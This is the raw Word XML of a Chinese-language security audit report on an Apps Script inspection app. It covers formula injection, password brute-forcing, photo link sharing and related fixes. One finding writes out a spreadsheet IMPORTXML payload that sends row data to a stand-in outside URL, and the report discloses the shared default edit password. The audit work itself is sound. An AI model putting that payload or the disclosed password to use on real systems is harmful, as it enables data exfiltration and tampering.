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0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:cs="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">程式碼資安檢測報告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:cs="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Audit Report（第三次掃描）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="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專案：sqc-checklist（SQC 評核系統）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="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掃描日期：2026/08/25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="2400" w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:cs="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="166534"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">整體判斷：允許部署</w:t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1. 執行摘要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="12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本次掃描的動機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前次掃描（2026/08/24）之後又新增了三組功能，都會碰到資料寫入與權限，因此重新掃描：（一）編輯／刪除非當週紀錄需輸入密碼；（二）匯入名單時一併轉入「梯次／評核日期區間」，並改以實際點檢日期判定梯次；（三）缺失照片改為「知道連結就能看」，以及多缺失項題目鎖定照片張數。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="24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掃描範圍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app.html（單檔 React SPA）、index.html（登入頁）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js/config.js、api.js、db.js、uploader.js、billing.js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service-worker.js（PWA 快取層）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backend/程式碼.gs（Apps Script 後端 API）、setup.gs、appsscript.json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vendor/（自帶函式庫：react、react-dom、babel-standalone、xlsx、exceljs、tailwindcss）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backend/test/（20 支回歸測試）、.github/workflows/（部署流程）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="24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前兩次項目複驗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08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288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108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首報日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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本次複驗結果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="FED7A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High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對所有登入者發放全域 Drive／Sheets OAuth 權杖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2026/08/20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已修復並複驗：全專案已無 getDriveToken（0 處），改由後端建立 Drive 可續傳上傳工作階段，只回傳單檔上傳網址。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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登入端點無失敗次數限制（可被當作 AD 破解代理）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2026/08/20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已修復並複驗：節流邏輯在位（同帳號失敗 5 次封鎖 15 分鐘），僅 100／200 計次；loginThrottle 測試通過。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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外部 CDN 未鎖版本且無 SRI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2026/08/20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已修復並複驗：app.html 與 index.html 的外部 CDN 引用皆為 0，六個函式庫自帶於 vendor/（同源）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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照片代理路由未驗證檔案歸屬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2026/08/24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已修復並複驗：fileUnderPhotoRoot_ 共 6 處使用，涵蓋縮圖、原圖、丟垃圾桶與本次新增的連結分享。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="108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使用已知有漏洞的 SheetJS 0.18.5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2026/08/24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已修復並複驗：vendor/ 內僅有 xlsx-0.20.3.full.min.js，舊版已移除。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="12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五項全部維持修復狀態，未見退回（regression）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="24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本次漏洞統計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</w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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312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數量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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處理狀態</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="FECAC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Critical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shd w:fill="FED7A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已自動修復</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="BBF7D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Low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僅列報告，不修改</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="BAE6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Info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僅列報告，不修改</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="12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本次新發現 2 項 Medium，均已於掃描過程中自動修復並補上回歸測試，因此判定為「允許部署」。兩項都不是既有功能退化，而是本次新增功能帶進來的：公式注入來自「把使用者自由文字寫進試算表」這條路徑（前兩次掃描的盲點），密碼可窮舉來自本次新增的跨週管控。另有 1 項 Low 屬使用者明確決策接受的業務風險（照片連結分享），已記錄殘餘風險與現有控制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="36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2. 漏洞詳細清單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1. Google Sheet 公式注入（使用者填的文字會被當公式執行）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A03 注入 / CWE-1236 公式元素注入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已自動修復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backend/程式碼.gs：recordToRow()（submitRecord、updateRecord 共用）、logChange()、upsertItem()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Apps Script 的 appendRow() 與 Range.setValues() 會把「=」「+」「-」「@」開頭的字串當成公式寫入儲存格並立即求值。本系統把點檢人員填的自由文字（備註、名單外自行新增的店名、缺失貨架名稱、異動說明）直接寫進點檢紀錄活頁，其中備註與店名是原樣字串（明細JSON／觀察JSON 以「{」開頭故不受影響）。任一位持有帳號的點檢人員只要在備註填 =IMPORTXML("https://外部網址/?d="&amp;A2,"//x")，Google 伺服器就會主動把同列資料（含店號、店名、點檢人員、分數）送到外部網址，形成資料外洩；亦可用 IMPORTDATA／HYPERLINK 進一步擴大，或以大量 IMPORT 函式讓活頁停止回應。攻擊者不需要管理者權限，也不需要接觸主機。前兩次掃描聚焦於 SQL／指令注入與 XSS（本專案皆不適用），漏掉了「試算表本身就是執行環境」這一面，本次補上。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已自動修復：新增 safeCell_()／safeRow_()，寫入前若字串以 = + - @ Tab CR 開頭就前置一個單引號強制為文字。單引號在 Google Sheet 是格式標記而非內容，getValues() 讀回時不含它，所以報表、查詢與匯出的內容完全不變，只是不再求值。數字型欄位（合計得分）不經過處理，維持數值型別以免影響統計與排序。匯入名單與梯次期間的寫入點原本就有 setNumberFormat('@')（純文字格式）故不需重複處理。新增回歸測試 formulaInjection.test.js（14 項）涵蓋中和、不誤傷正常內容、以及實際寫入路徑。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2. 跨週修改密碼可被無限次嘗試（四位數密碼等於形同虛設）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FEF0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A07 身分驗證失效 / CWE-307 未限制驗證嘗試次數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已自動修復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backend/程式碼.gs：checkEditPass()、guardCrossWeek()（updateRecord／deleteRecord 共用）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本次新增「編輯／刪除非當週紀錄需輸入密碼」的管控，密碼預設 9588（四位數字，全體共用）。原實作只做字串比對，沒有任何次數限制，且 checkEditPass、updateRecord、deleteRecord 三支路由都收密碼，任一支都能被拿來窮舉 —— 一萬種組合以程式連續呼叫數分鐘內即可試完，這道管控實際上擋不住任何人。衝擊為稽核資料的完整性：可繞過管控回頭竄改或刪除已結案的歷史紀錄。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已自動修復：以登入者為單位計次（CacheService），連續錯誤 8 次即封鎖 10 分鐘，封鎖期間即使密碼正確也一併擋下；輸入正確密碼即歸零。計次放在 checkEditPass 這個共用驗證點，並讓 guardCrossWeek 改為呼叫它，因此走 updateRecord／deleteRecord 也同樣受限，不會有漏網的路徑。前端會區分「密碼錯誤」與「已被鎖定」兩種提示，避免使用者一直重試。回歸測試 crossWeekGuard.test.js 增加 5 項（含「鎖定只針對該使用者」與「不能改走 updateRecord 繞過」）。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3. 缺失照片改為「知道連結的人都能看」（經使用者決策接受）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BBF7D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A01 存取控制失效（評估後判定為可接受的業務風險）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不修復（使用者決策接受風險）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backend/程式碼.gs：shareLinkedPhotos()、backend/setup.gs：sharePhotosByLink()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原本照片僅限雲端硬碟有權限者檢視，導致報表收件人點連結會被要求登入 Google 帳號。使用者於 2026-08-25 明確要求改為「有連結就能看」，因此上傳完成回寫連結時，會逐檔設為 ANYONE_WITH_LINK / VIEW。殘餘風險：任何取得連結者（含公司外部）可檢視該張照片，且連結一旦外流無法自動失效。照片內容為門市現場缺失照，可能含店員身影或店內陳列。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不修復（業務需求）。已採取的控制：（1）逐檔設定，不是把整個照片資料夾對外公開，因此無法藉資料夾列出其他照片；（2）設定前一律以 fileUnderPhotoRoot_() 確認檔案位於本系統照片根目錄底下，任何不屬於本系統的 Drive 檔案都不可能透過此 API 被對外公開；（3）權限只給 VIEW，不含編輯或留言；（4）Drive 檔案 ID 為 33 字元不可猜測值，且不提供列舉介面。建議：報表流通範圍以公司內部為限；若日後政策改變，把 setSharing 那一行移除即可回到僅限內部檢視。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4. 跨週修改密碼以 prompt() 明碼顯示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BBF7D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A07 身分驗證失效（風險有限）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不修復（僅建議）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app.html：askCrossWeekPass()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密碼以瀏覽器原生 prompt() 輸入，輸入內容不遮蔽，門市現場可能被旁人看見。該密碼為全體共用的內部管控碼、非個人帳號憑證，且僅用於放行歷史紀錄的修改，衝擊有限。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建議改為系統內的遮蔽輸入框（type="password"）取代 prompt。屬 Low 不自動修改，以免在此次部署同時改動編輯流程的 UI。密碼可在「設定」活頁的「跨週修改密碼」自行更換，不需改程式。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5. 後端例外訊息原樣回傳前端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BBF7D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A05 安全設定缺失（生產環境隔離）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不修復（僅建議）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backend/程式碼.gs：doPost 的 catch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例外訊息（可能含活頁名稱、範圍、內部函式名稱）直接放入回應的 error 欄位回傳瀏覽器，對攻擊者具偵查價值。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建議對外統一回傳通用訊息與錯誤代碼，詳細訊息改以 Logger 記錄於伺服器端。因目前錯誤訊息是現場排錯的重要依據，屬 Low 不自動修改（沿續前兩次報告的判斷）。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6. 前端以 alert 顯示例外堆疊給使用者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BBF7D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A05 安全設定缺失（生產環境隔離）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不修復（僅建議）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app.html：全域錯誤攔截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全域錯誤攔截器將例外堆疊前 800 字以 alert 顯示並請使用者截圖回報，可能揭露函式名稱與程式結構。系統僅供內部人員使用，風險有限。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建議正式環境只顯示錯誤代碼與回報指引，完整堆疊僅寫入 console。屬 Low 不自動修改。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7. 以 eval 執行 Babel 編譯結果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BAE6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Info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A03 注入（評估後判定非注入風險）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不修復（僅建議）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app.html：啟動區塊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在瀏覽器以 Babel 編譯同一份 HTML 內的 JSX 後以 eval 執行。輸入為同源、與頁面一同傳輸的靜態內容，非使用者輸入。函式庫自帶後供應鏈風險已大幅降低。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無需修改。若日後加入建置步驟（部署前先把 JSX 編成 JS 並提交產物），可一併移除瀏覽器端 eval 與 2.4MB 的 Babel standalone。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="24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8. 登入權杖存放於 sessionStorage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嚴重度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7560"/>
            <w:shd w:fill="BAE6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Info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分類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OWASP A07 身分驗證失效（評估後判定為可接受）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修復狀態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不修復（僅建議）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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受影響位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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js/api.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="16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問題描述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非 Cookie 故 HttpOnly／Secure／SameSite 不適用。權杖以 Utilities.getUuid() 產生（非弱隨機），伺服器端 6 小時失效，關閉分頁即從瀏覽器消失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="12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修復說明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無需修改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="36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3. 修復前後對照</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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第 1 項：公式注入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修復前：return head.map(function (h) { return map[h] != null ? map[h] : ''; });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修復後：return head.map(function (h) { return safeCell_(map[h] != null ? map[h] : ''); });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="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safeCell_：字串以 = + - @ Tab CR 開頭時前置單引號；非字串（數字）原樣回傳。logChange 與 upsertItem 同步套用；upsertRow 與名單／梯次匯入原本已用 setNumberFormat('@')。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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第 2 項：跨週密碼次數限制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修復前：function checkEditPass(pass) { return { ok: String(pass || '') === editPassword() }; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="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修復後：先查 editPassBlocked(who)（連錯 8 次鎖 10 分鐘），比對後 editPassOk／editPassFail 更新計次；guardCrossWeek 改為呼叫 checkEditPass，使 updateRecord／deleteRecord 一併受限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="36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4. 存取控制現況（本次一併確認）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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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480"/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0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">現況</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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未登入可呼叫的路由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login 一支（OPEN = { login: 1 }）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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需管理者權限的路由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importMaster、upsertItem、deleteItem、upsertRow、deleteRow、getMaster、getChangeLog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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其餘路由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一律需有效權杖（6 小時失效）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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本次新增路由的權限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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">checkEditPass 需登入且不回傳密碼內容（只回 ok／是否被鎖定）；梯次期間的寫入走 importMaster，屬管理者專用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="36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5. 已檢查且未發現問題的項目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SQL Injection：專案無資料庫、無 SQL 語句（資料存於 Google Sheet）。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Command Injection：無 shell 呼叫、未對使用者輸入求值。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XSS：前端以 React 渲染（自動逸脫）；唯一 innerHTML（app.html 啟動失敗訊息）非使用者輸入。照片縮圖以 data: URL 由後端產生，未插入 HTML。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硬編碼密碼與 API Key：以正規表達式掃過 .gs／.js／.html（排除 vendor）為 0 處。AD 密碼即時轉發驗證，未落地儲存、未寫入日誌。跨週管控碼放「設定」活頁而非程式碼，且程式只在比對時讀取、任何 API 都不回傳其內容。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加密與弱隨機：未發現 MD5／SHA1／DES 或 verify=False；權杖以 Utilities.getUuid() 產生。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SSRF：對外請求僅 AUTH_API（固定常數）與 Drive API 端點，目標不受使用者輸入影響；建立上傳工作階段時帶的 Origin 取自 ALLOWED_ORIGINS 白名單，非前端自由指定。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路徑穿越：Drive 路徑由後端以 DRIVE_ROOT_ID 為根逐層建立；讀取／刪除／分享照片一律先驗證檔案歸屬。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梯次期間匯入：parseBatchRange 只接受「月/日-月/日」格式，解析不出來就回空值不猜測；寫入前已設純文字格式，故不受公式注入影響；此路由屬管理者專用。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ReDoS：本次新增的正規表達式（區間解析、缺失名稱切分、公式開頭判斷）皆為線性、無嵌套量詞。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不安全的反序列化：僅以 JSON.parse 處理自有 API 回應與 Sheet 欄位，並以 safeJson 包住。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供應鏈：六個函式庫自帶於同源，vendor/README.md 記錄版本、來源與 SHA-256；未新增任何外部依賴。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最小權限與網路設定：無 0.0.0.0/0，無 Terraform／Security Group 設定檔。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部署流程：.github/workflows 以 Workload Identity 聯邦驗證（無長期金鑰），且部署前強制檢查當日資安報告。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="36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6. 結論</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="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前兩次的五項（High 1 項、Medium 4 項）複驗全部維持修復狀態。本次新發現 2 項 Medium，已於掃描過程中自動修復並補上回歸測試；全套 20 支測試通過，並在真實瀏覽器完成渲染煙霧測試（App 掛載成功、window.__errors 為空、點檢日期預設當日、點檢時間留空、店鋪搜尋正常）。目前僅餘 4 項 Low、2 項 Info，其中 1 項 Low 為使用者明確決策接受的業務風險，依部署判斷標準為「允許部署」。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="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後續建議：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照片連結分享屬業務決策的殘餘風險，建議在報表上加註「連結請勿轉傳至公司外部」，並定期以 reportPhotoSharing 檢視已公開的張數。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跨週管控碼建議改為系統內的遮蔽輸入框，並定期（例如每季）在「設定」活頁更換一次。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第 5、6 項（錯誤訊息與堆疊顯示）建議在系統穩定、現場不再需要即時排錯資訊後，收斂為通用錯誤碼。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若日後加入建置步驟把 JSX 預先編譯，可同時移除瀏覽器端 eval 與 2.4MB 的 Babel standalone。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軟正黑體" w:cs="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vendor/ 內的版本已固定，建議每季檢視一次是否有安全性更新，更新時依 README 的步驟實測後再提交。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2026-08-25T02:10:05.374Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-25T02:10:05.375Z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